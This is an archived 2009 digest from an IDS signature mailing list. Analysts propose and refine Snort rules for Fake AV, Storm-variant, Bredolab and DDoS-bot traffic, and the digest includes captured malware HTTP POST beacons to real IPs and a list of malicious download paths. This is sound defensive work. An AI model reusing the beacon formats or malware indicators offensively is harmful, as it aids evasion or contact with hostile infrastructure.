> 21   2010221         2/installer/Installer.exe                          123
>      trojan fakerean
> 22   new             rsf/loadjavad.php                                  111
>      exploits / trojan oficla
> 23   new             rsf/files/annonce.pdf                              111
>      exploits / trojan oficla
> 24   new             rsf/files/sdfg.jar                                 111
>      exploits / trojan oficla
> 25   new             rsf/js/common.js                                   111
>      exploits / trojan oficla
> 26   new             rsf/index.php                                      111
>      exploits / trojan oficla
> 27   new             hitin.php                                          89
>       fraudtool.win32.roguesecurity
> 28   none            download.php                                       82
>       fraudtool.win32.roguesecurity
> 29   none            fkzd/2.htm                                         70
>       directs to exploits
> 30   new             globaldirectory/updatetool.exe                     68
>       trojan zbot
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091202/d26a3979/attachment-0001.html

From mike.cox52 at gmail.com  Wed Dec  2 10:43:16 2009
From: mike.cox52 at gmail.com (Mike Cox)
Date: Wed, 2 Dec 2009 09:43:16 -0600
Subject: [Emerging-Sigs] ET TROJAN Potential Gemini/Fake AV Download URL
	Detected
Message-ID: <6116b9e20912020743n5dd8de20t20234940e551230b@mail.gmail.com>

Whenever the Gemini Malware Download sig fires (SID 2010007), I often see
requests similar to the following on the fake AV pages:

GET /Layouts/Landings/CentralLandings/6/images/list/all_vert.gif

Therefore I propose this signature:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
Potential Gemini/Fake AV Download URL Detected"; flow:established,to_server;
uricontent:"/Layouts/Landings/CentralLandings/"; nocase;
uricontent:"/images/"; nocase;
pcre:"/\x2FLayouts\x2FLandings\x2FCentralLandings\x2F\d+\x2Fimages\x2F/Ui";
classtype:trojan-activity; reference:url,
www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791;
reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini;
sid:2010xxx; rev:1;)

-Mike Cox
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091202/a25dc848/attachment.html

From inurbitz at yahoo.com  Wed Dec  2 11:39:43 2009
From: inurbitz at yahoo.com (Packet Hack)
Date: Wed, 2 Dec 2009 08:39:43 -0800 (PST)
Subject: [Emerging-Sigs] Possible Storm Variants?
Message-ID: <678792.94227.qm@web113703.mail.gq1.yahoo.com>

I've noticed one of the User Agent sigs grabbing HTTP POSTs to /s/ or /u/ : 

  ---------------------------------------------------------------
  ET MALWARE Suspicious User Agent (Internet Explorer)
  10.XX.XX.XX      |  4542 | 78.159.121.122   |    80 | tcp | 2009-10-01 19:08:40
  ---------------------------------------------------------------
  POST /u/ HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Internet Explorer
  Host: 78.159.121.122
  Content-Length: 259
  Cache-Control: no-cache

  a=fHNhtGJ5LzO5vNQaEJuqYsFsFBUFF6jbnJ3L25HFjbdeyCrPITCVnFqI%2fa7sEyV%2f6guCC
  %2ffRT2b0a9zXDdzd2ZJ31NibkEcJsn%2fKicanJpAmYbjlDWK4R8aWMSamo2vq6qI%2bL4YXZ7
  zzELn2%2bXLPW2oomftdVFacg83A2WZxgBI%3d&b=VK%2bifDhDhMNxO%2b3je7BkXS9sFSAZ
  Uzd1JsxskM3szznhvpsRQZrlqi9yy1xHs3hA

---------------------------------------------------------------
ET USER_AGENTS Suspicious User Agent (Internet Explorer)
10.XX.XX.XX      |  1897 | 206.161.121.210  |    80 | tcp | 2009-10-26 09:03:46
---------------------------------------------------------------
POST /s/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Internet Explorer
Host: 206.161.121.210
Content-Length: 5301
Cache-Control: no-cache

  a=pnHnhsbS4FB2DEWedR8HtvsMEVhrR0r42PX1rIgAU8Y8WazTIlnjGllHi%2fUIuV6LqdgptLbAjhX
  %2bAH5E5IBwChyTzP6bMfV%2feEoKZus4fsSsDQyCb6ZO7Rudymzr6tjEOwxbdzQirsZUgeUQ5f3
  ORX5zU8ndf%2fuU1vzyx4i%2bPW0%3d&b=b2KZN8OSUjlfKyg7YvshDWYe6nPgNg%2bz3LRXifj
  FgjUNTSrmkpQfMNCluwlBOvLkegiqpz%2bAR2Al%2bRAOlD6jAbMo93t5j9soKPMHpoBfgX56XS
  OqlE3sPOlQGFSjogNzSEuIsZMrycrcdqBnlD60ZV%2fEIeep4VyOBJCm2JVPISGGD4Nq3cvuFS6M4
  %2f2JQCzdzeotCkwhcINzIj%2fOTl6%2fFt7A1eAY1hg%2fclykbfDkVwTmZSBGJjpRwsdMLNkHT%2f
  l7oa83f812P7UU%2bXide3Q%2fz7HdergzGqBmefXDSriVFxA6RcPeRvg5t6oA%2fph5KO9c9VHmv
  UTl%2b0oRw%2fNcxLVMWenUqW0ZC6z%2ftMPZB3UPuRzlkTTXd23ZJwe3TvM5pxRf6zYUlexf
  %2fOzrIsA8hUZGxI3o4BTMIAwUKqfVyiPzbo7r47g9EQnSAm6p%2bj3o3ounueCPTA%2bMzipa9O
  vQ7gO5M0RUf2MqN5CdCFfdtfNfRqdtq9X90WZLmol%2fdOaa4xZ7IJ9AB5HQnpfH6gsydcvchTEvN
  Q9TPTXLAutZsAiwQtvjxW1WQDkZCkgtMEV2EpamN%2fRMyqv46bG2RG84ggQbnjjpN0zdhjuUZ
  V3soXT6sa9Es8VsrNfMQaEaJAXtA%2bPM46CO%2bkemo4Eb3ULcQMUuwhhSYgjd3A%2bbq1M
  vuIxsgWjXJnw3xK7iHPh3AsssnBkAOLqZkPA%2bfSfW0228sDLC%2fb9o3Ka1dtAEGe3cD4f%2fxB
  zNMNlsLyNodfgGfBsznIq%2fPnlZJ4KdVrQO1yOSOL2I1C7igvzP8WqUZxN%2bk0gqzfDtlyMbmpnZ
  DIahFVIOiTImgbfcJuPn7EiUi8m1eFDv74LlTPMJFTPNj255El3LBNlBJRvCZYHA2CcXX3eo65Y6k
  zkFiGaK2PFnfIVCQzI%2fsi%2bFtZzx%2fQjBtSz2xflRdd5x1sa%2b5xbnXxPIQEps

The only reference I could find that came close to an analysis of sessions like these 
was here: 

  http://cyber.secdev.ca/2009/11/russian-malware-bundle

and it cited Joe Stewart's paper on Storm Worm:

  https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

I threw together a couple of sigs that should catch these, but I'm not even sure what they are. 
With HTTP POSTs to IPs with obfuscated data, they look pretty suspcious though. 

Thoughts?

-- pkthck

-------------------------------------------------------------

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible
Storm Variant HTTP Post (S)"; flow:established,to_server; content:"POST
/s/ HTTP" depth:13; content:"a="; content:"User-Agent\: Internet
Explorer"; classtype:trojan-activity;
reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle;
reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf;
sid:XXXXXXX; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible
Storm Variant HTTP Post (U)"; flow:established,to_server; content:"POST
/u/ HTTP" depth:13; content:"a="; content:"User-Agent\: Internet
Explorer"; classtype:trojan-activity;
reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle;
reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf;
sid:XXXXXXX; rev:1;)



      
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091202/21022958/attachment.html

From jonkman at jonkmans.com  Wed Dec  2 12:15:58 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Wed, 2 Dec 2009 12:15:58 -0500
Subject: [Emerging-Sigs] Possible Storm Variants?
In-Reply-To: <678792.94227.qm@web113703.mail.gq1.yahoo.com>
References: <678792.94227.qm@web113703.mail.gq1.yahoo.com>
Message-ID: <D8FCE421-368C-4AFA-B988-247EC3B9C54F@jonkmans.com>

Posted with minor changes. THanks!!

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Possible Storm Variant HTTP Post (S)"; flow:established,to_server; content:"POST /s/ HTTP" depth:13; content:"|0d 0a|User-Agent\: Internet Explorer|0d 0a|"; content:"|0d 0a 0d 0a|a="; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:2010441; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Possible Storm Variant HTTP Post (U)"; flow:established,to_server; content:"POST /u/ HTTP" depth:13; content:"|0d 0a|User-Agent\: Internet Explorer|0d 0a|"; content:"|0d 0a 0d 0a|a="; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:2010442; rev:1;)


On Dec 2, 2009, at 11:39 AM, Packet Hack wrote:

> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Storm Variant HTTP Post (S)"; flow:established,to_server; content:"POST /s/ HTTP" depth:13; content:"a="; content:"User-Agent\: Internet Explorer"; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:XXXXXXX; rev:1;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Storm Variant HTTP Post (U)"; flow:established,to_server; content:"POST /u/ HTTP" depth:13; content:"a="; content:"User-Agent\: Internet Explorer"; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:XXXXXXX; rev:1;)


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From evilghost at packetmail.net  Wed Dec  2 12:15:55 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Wed, 2 Dec 2009 11:15:55 -0600
Subject: [Emerging-Sigs] Possible Storm Variants?
In-Reply-To: <678792.94227.qm@web113703.mail.gq1.yahoo.com>
References: <678792.94227.qm@web113703.mail.gq1.yahoo.com>
Message-ID: <4B16A0CB.7090206@packetmail.net>

I like these, what about the minor changes below (anchor User-Agent, add 
/1 after HTTP, nocase, no HTTP referer, and add semi-colon after first 
content match):

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Possible
Storm Variant HTTP Post (S)"; flow:established,to_server; content:"POST
/s/ HTTP/1"; nocase; depth:15; content:"a="; content:"|0d 0a|User-Agent\: Internet
Explorer|0d 0a|"; nocase; content:!"|0d 0a|Referer\:"; nocase;
classtype:trojan-activity;
reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle;
reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf;
sid:XXXXXXX; rev:2;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible
Storm Variant HTTP Post (U)"; flow:established,to_server; content:"POST
/u/ HTTP/1"; nocase; depth:15; content:"a="; content:"|0d 0a|User-Agent\: Internet
Explorer|0d 0a|"; nocase; content:!"|0d 0a|Referer\:"; nocase;
classtype:trojan-activity;
reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle;
reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf;
sid:XXXXXXX; rev:2;)

-evilghost

Packet Hack wrote:
> I've noticed one of the User Agent sigs grabbing HTTP POSTs to /s/ or /u/ : 
>
>   ---------------------------------------------------------------
>   ET MALWARE Suspicious User Agent (Internet Explorer)
>   10.XX.XX.XX      |  4542 | 78.159.121.122   |    80 | tcp | 2009-10-01 19:08:40
>   ---------------------------------------------------------------
>   POST /u/ HTTP/1.1
>   Content-Type: application/x-www-form-urlencoded
>   User-Agent: Internet Explorer
>   Host: 78.159.121.122
>   Content-Length: 259
>   Cache-Control: no-cache
>
>   a=fHNhtGJ5LzO5vNQaEJuqYsFsFBUFF6jbnJ3L25HFjbdeyCrPITCVnFqI%2fa7sEyV%2f6guCC
>   %2ffRT2b0a9zXDdzd2ZJ31NibkEcJsn%2fKicanJpAmYbjlDWK4R8aWMSamo2vq6qI%2bL4YXZ7
>   zzELn2%2bXLPW2oomftdVFacg83A2WZxgBI%3d&b=VK%2bifDhDhMNxO%2b3je7BkXS9sFSAZ
>   Uzd1JsxskM3szznhvpsRQZrlqi9yy1xHs3hA
>
> ---------------------------------------------------------------
> ET USER_AGENTS Suspicious User Agent (Internet Explorer)
> 10.XX.XX.XX      |  1897 | 206.161.121.210  |    80 | tcp | 2009-10-26 09:03:46
> ---------------------------------------------------------------
> POST /s/ HTTP/1.1
> Content-Type: application/x-www-form-urlencoded
> User-Agent: Internet Explorer
> Host: 206.161.121.210
> Content-Length: 5301
> Cache-Control: no-cache
>
>   a=pnHnhsbS4FB2DEWedR8HtvsMEVhrR0r42PX1rIgAU8Y8WazTIlnjGllHi%2fUIuV6LqdgptLbAjhX
>   %2bAH5E5IBwChyTzP6bMfV%2feEoKZus4fsSsDQyCb6ZO7Rudymzr6tjEOwxbdzQirsZUgeUQ5f3
>   ORX5zU8ndf%2fuU1vzyx4i%2bPW0%3d&b=b2KZN8OSUjlfKyg7YvshDWYe6nPgNg%2bz3LRXifj
>   FgjUNTSrmkpQfMNCluwlBOvLkegiqpz%2bAR2Al%2bRAOlD6jAbMo93t5j9soKPMHpoBfgX56XS
>   OqlE3sPOlQGFSjogNzSEuIsZMrycrcdqBnlD60ZV%2fEIeep4VyOBJCm2JVPISGGD4Nq3cvuFS6M4
>   %2f2JQCzdzeotCkwhcINzIj%2fOTl6%2fFt7A1eAY1hg%2fclykbfDkVwTmZSBGJjpRwsdMLNkHT%2f
>   l7oa83f812P7UU%2bXide3Q%2fz7HdergzGqBmefXDSriVFxA6RcPeRvg5t6oA%2fph5KO9c9VHmv
>   UTl%2b0oRw%2fNcxLVMWenUqW0ZC6z%2ftMPZB3UPuRzlkTTXd23ZJwe3TvM5pxRf6zYUlexf
>   %2fOzrIsA8hUZGxI3o4BTMIAwUKqfVyiPzbo7r47g9EQnSAm6p%2bj3o3ounueCPTA%2bMzipa9O
>   vQ7gO5M0RUf2MqN5CdCFfdtfNfRqdtq9X90WZLmol%2fdOaa4xZ7IJ9AB5HQnpfH6gsydcvchTEvN
>   Q9TPTXLAutZsAiwQtvjxW1WQDkZCkgtMEV2EpamN%2fRMyqv46bG2RG84ggQbnjjpN0zdhjuUZ
>   V3soXT6sa9Es8VsrNfMQaEaJAXtA%2bPM46CO%2bkemo4Eb3ULcQMUuwhhSYgjd3A%2bbq1M
>   vuIxsgWjXJnw3xK7iHPh3AsssnBkAOLqZkPA%2bfSfW0228sDLC%2fb9o3Ka1dtAEGe3cD4f%2fxB
>   zNMNlsLyNodfgGfBsznIq%2fPnlZJ4KdVrQO1yOSOL2I1C7igvzP8WqUZxN%2bk0gqzfDtlyMbmpnZ
>   DIahFVIOiTImgbfcJuPn7EiUi8m1eFDv74LlTPMJFTPNj255El3LBNlBJRvCZYHA2CcXX3eo65Y6k
>   zkFiGaK2PFnfIVCQzI%2fsi%2bFtZzx%2fQjBtSz2xflRdd5x1sa%2b5xbnXxPIQEps
>
> The only reference I could find that came close to an analysis of sessions like these 
> was here: 
>
>   http://cyber.secdev.ca/2009/11/russian-malware-bundle
>
> and it cited Joe Stewart's paper on Storm Worm:
>
>   https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf
>
> I threw together a couple of sigs that should catch these, but I'm not even sure what they are. 
> With HTTP POSTs to IPs with obfuscated data, they look pretty suspcious though. 
>
> Thoughts?
>
> -- pkthck
>
> -------------------------------------------------------------
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible
> Storm Variant HTTP Post (S)"; flow:established,to_server; content:"POST
> /s/ HTTP" depth:13; content:"a="; content:"User-Agent\: Internet
> Explorer"; classtype:trojan-activity;
> reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle;
> reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf;
> sid:XXXXXXX; rev:1;)
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible
> Storm Variant HTTP Post (U)"; flow:established,to_server; content:"POST
> /u/ HTTP" depth:13; content:"a="; content:"User-Agent\: Internet
> Explorer"; classtype:trojan-activity;
> reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle;
> reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf;
> sid:XXXXXXX; rev:1;)
>
>
>
>       
>   
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>   

From evilghost at packetmail.net  Wed Dec  2 12:23:33 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Wed, 2 Dec 2009 11:23:33 -0600
Subject: [Emerging-Sigs] Possible Storm Variants?
In-Reply-To: <D8FCE421-368C-4AFA-B988-247EC3B9C54F@jonkmans.com>
References: <678792.94227.qm@web113703.mail.gq1.yahoo.com>
	<D8FCE421-368C-4AFA-B988-247EC3B9C54F@jonkmans.com>
Message-ID: <4B16A295.10208@packetmail.net>

Matt, I'd really like to add a negated content match on the HTTP REFERER 
if possible, I feel this may eliminate some false positives. Also nocase 
on the content matches to accommodate non-RFC compliant methods (GET vs 
get vs gEt, etc) from the endpoints.

Matthew Jonkman wrote:
> Posted with minor changes. THanks!!
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Possible Storm Variant HTTP Post (S)"; flow:established,to_server; content:"POST /s/ HTTP" depth:13; content:"|0d 0a|User-Agent\: Internet Explorer|0d 0a|"; content:"|0d 0a 0d 0a|a="; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:2010441; rev:1;)
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Possible Storm Variant HTTP Post (U)"; flow:established,to_server; content:"POST /u/ HTTP" depth:13; content:"|0d 0a|User-Agent\: Internet Explorer|0d 0a|"; content:"|0d 0a 0d 0a|a="; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:2010442; rev:1;)
>
>
> On Dec 2, 2009, at 11:39 AM, Packet Hack wrote:
>
>   
>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Storm Variant HTTP Post (S)"; flow:established,to_server; content:"POST /s/ HTTP" depth:13; content:"a="; content:"User-Agent\: Internet Explorer"; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:XXXXXXX; rev:1;)
>>
>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Storm Variant HTTP Post (U)"; flow:established,to_server; content:"POST /u/ HTTP" depth:13; content:"a="; content:"User-Agent\: Internet Explorer"; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:XXXXXXX; rev:1;)
>>     
>
>
> ----------------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> ----------------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>   

From jonkman at jonkmans.com  Wed Dec  2 13:26:17 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Wed, 2 Dec 2009 13:26:17 -0500
Subject: [Emerging-Sigs] Possible Storm Variants?
In-Reply-To: <4B16A295.10208@packetmail.net>
References: <678792.94227.qm@web113703.mail.gq1.yahoo.com>
	<D8FCE421-368C-4AFA-B988-247EC3B9C54F@jonkmans.com>
	<4B16A295.10208@packetmail.net>
Message-ID: <52EE2F7C-F053-446D-BE35-98216A3CAB8A@jonkmans.com>

Sure thing. Making the changes now.

Matt

On Dec 2, 2009, at 12:23 PM, evilghost at packetmail.net wrote:

> Matt, I'd really like to add a negated content match on the HTTP REFERER 
> if possible, I feel this may eliminate some false positives. Also nocase 
> on the content matches to accommodate non-RFC compliant methods (GET vs 
> get vs gEt, etc) from the endpoints.
> 
> Matthew Jonkman wrote:
>> Posted with minor changes. THanks!!
>> 
>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Possible Storm Variant HTTP Post (S)"; flow:established,to_server; content:"POST /s/ HTTP" depth:13; content:"|0d 0a|User-Agent\: Internet Explorer|0d 0a|"; content:"|0d 0a 0d 0a|a="; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:2010441; rev:1;)
>> 
>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Possible Storm Variant HTTP Post (U)"; flow:established,to_server; content:"POST /u/ HTTP" depth:13; content:"|0d 0a|User-Agent\: Internet Explorer|0d 0a|"; content:"|0d 0a 0d 0a|a="; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:2010442; rev:1;)
>> 
>> 
>> On Dec 2, 2009, at 11:39 AM, Packet Hack wrote:
>> 
>> 
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Storm Variant HTTP Post (S)"; flow:established,to_server; content:"POST /s/ HTTP" depth:13; content:"a="; content:"User-Agent\: Internet Explorer"; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:XXXXXXX; rev:1;)
>>> 
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Storm Variant HTTP Post (U)"; flow:established,to_server; content:"POST /u/ HTTP" depth:13; content:"a="; content:"User-Agent\: Internet Explorer"; classtype:trojan-activity; reference:url,cyber.secdev.ca/2009/11/russian-malware-bundle; reference:url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf; sid:XXXXXXX; rev:1;)
>>> 
>> 
>> 
>> ----------------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Open Information Security Foundation (OISF)
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> http://www.openinformationsecurityfoundation.org
>> ----------------------------------------------------
>> 
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>> 
>> 
>> 
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> 
>> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From phatbuckett at gmail.com  Wed Dec  2 14:43:08 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Wed, 2 Dec 2009 12:43:08 -0700
Subject: [Emerging-Sigs] Two new signatures (Bredolab + FakeAV),
	and and 	proposed modification to SID 2009354
In-Reply-To: <4B14350F.1050802@packetmail.net>
References: <4B14350F.1050802@packetmail.net>
Message-ID: <839aec700912021143o3aaea5a5r7f193a4c0d340e29@mail.gmail.com>

The match on ?ddos=x7x29x1x36x32x27x16x29x32x31x17x27x7x36x29x18x30x9x33x27x13x29x0x7
isn't Bredolab, it's something else (I presume a DDoS bot). The
Bredolab communication is that referencing
youaskedthedomain.cn/spl/controller.php[...].

Anybody recognize it?

DS


On Mon, Nov 30, 2009 at 2:11 PM, evilghost at packetmail.net
<evilghost at packetmail.net> wrote:
> SID 2009354, based on http://threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37 I suggest changing the uricontent:"&entity="; to uricontent:"&entity";
>
> Proposed new signatures below:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> Bredolab Checkin"; flow:to_server,established; content:"GET "; depth:4;
> uricontent:"?ddos=x"; nocase; pcre:"/\x3Fddos\x3D(x\d{1,2}){5,}/Ui";
> classtype:trojan-activity;
> reference:url,threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab;
> sid:2009xxx; rev:1;)
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Fake
> AV GET"; flow:established,to_server; content:"GET "; depth:4;
> uricontent:".php?"; nocase; uricontent:"affid="; nocase;
> uricontent:"subid="; nocase; uricontent:"type="; nocase;
> uricontent:"version="; nocase; uricontent:"adware"; nocase;
> classtype:trojan-activity;
> reference:url,threatexpert.com/report.aspx?md5=8d1b47452307259f1e191e16ed23cd35;
> sid:2009xxx; rev:1;)
>
> Comments/flames welcome.
>
> -evilghost
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Darren Spruell
phatbuckett at gmail.com

From emerging at emergingthreats.net  Wed Dec  2 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed,  2 Dec 2009 16:00:12 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091202210012.F32CE4504E@goliath.jonkmans.com>


[***] Results from Oinkmaster started Wed Dec  2 16:00:12 2009 [***]

[+++]          Added rules:          [+++]

 2010441 - ET TROJAN Possible Storm Variant HTTP Post (S) (emerging-virus.rules)
 2010442 - ET TROJAN Possible Storm Variant HTTP Post (U) (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (46):
        2010441 || ET TROJAN Possible Storm Variant HTTP Post (S) || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010442 || ET TROJAN Possible Storm Variant HTTP Post (U) || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2500540 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500541 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
